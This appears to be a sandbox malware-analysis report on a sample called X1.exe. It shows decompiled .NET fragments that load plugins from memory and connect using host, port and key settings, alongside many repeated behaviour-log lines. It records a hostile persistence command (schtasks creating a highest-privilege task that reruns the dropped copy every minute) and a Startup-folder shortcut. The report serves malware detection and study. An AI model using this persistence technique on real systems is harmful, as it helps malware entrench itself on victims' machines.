                            Source: X1.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: X1.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: X1.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            .NET source code contains potential unpacker
                            Source: X1.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: X1.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: X1.exe, Messages.cs.Net Code: Memory
                            Source: X1.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: X1.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: X1.exe.0.dr, Messages.cs.Net Code: Memory
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E0D2A5 pushad ; iretd 2_2_00007FF848E0D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F2B9FA push E85A8DD7h; ret 2_2_00007FF848F2BAF9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E0D2A5 pushad ; iretd 5_2_00007FF848E0D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848DFD2A5 pushad ; iretd 8_2_00007FF848DFD2A6
                            Source: C:\Users\user\Desktop\X1.exeFile created: C:\Users\user\AppData\Roaming\X1.exeJump to dropped file

                            Boot Survival

                            barindex
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"
                            Source: C:\Users\user\Desktop\X1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1.lnkJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1.lnkJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
